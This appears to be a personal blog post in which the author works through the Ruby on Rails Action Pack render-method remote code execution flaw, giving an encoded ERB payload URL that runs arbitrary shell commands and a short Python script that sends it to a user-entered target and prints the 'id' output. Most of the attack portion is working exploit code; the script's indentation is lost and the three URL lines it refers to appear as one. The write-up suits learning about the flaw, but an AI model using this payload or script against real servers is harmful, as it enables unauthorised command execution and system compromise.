"Action Pack in Ruby on Rails before, 4.x before, and 4.2.x before allows remote attackers to execute arbitrary Ruby code by leveraging an application's unrestricted use of the render method."

I realize that I'm not going to understand everything but at times I feel like I'm nothing more than a really determined script kiddie.  That said, this seemed like something I could grasp and when I came across the vulnerable server, I found a  Metasploit module for exploiting it.  After reading through the Ruby, about Ruby, without having much experience with Ruby, I was none the wiser.

I looked for alternative exploit code in the various locations to get a better understanding but what I found were elaborate examples.  In hindsight, I'm not sure for what.  I just wanted to maybe grasp what exactly was going on without pointing Metasploit at it. 

Searching a bit more, I found a smaller proof of concept and while digging through it, I could see what was happening.  Basically, you have a url:


Our interaction is happening past: ?id

http://victim/pages?id[inline]=%3C%25=%20%25x(INSERT COMMAND HERE)%20%25%3E

Line one is our original, line two is the encoded exploitation, and line three is asking for "id".

Playing with Python, I wrote this little script to take the URL, pass "id" and parse the output to clean up all the noise in the response:

import urllib2
import requests
host = raw_input("Enter target Url eg (http://victim/pages?id) : ")
url = urllib2.urlopen(host + "[inline]=%3C%25=%20%25x(id)%20%25%3E")
html = url.readlines()
for line in html:
if 'uid=' in line:
print line

You can also work with this straight in the browser: